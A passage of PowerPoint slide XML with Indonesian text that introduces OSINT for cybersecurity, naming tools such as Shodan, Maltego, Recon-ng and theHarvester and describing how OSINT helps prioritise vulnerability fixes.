              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, OSINT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengumpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> blog, forum, platform media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru-baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peneliti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OSINT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengumpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OSINT yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Shodan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyelidiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Maltego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvisualisasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Recon-ng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengintaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>theHarvester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengumpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email, subdomain, host, dan nama-nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>OSINT Framework </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. https://github.com/lockfale/osint-framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>OSINT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berharga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> liar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didiskusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di forum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peretasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbaiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, OSINT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memainkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
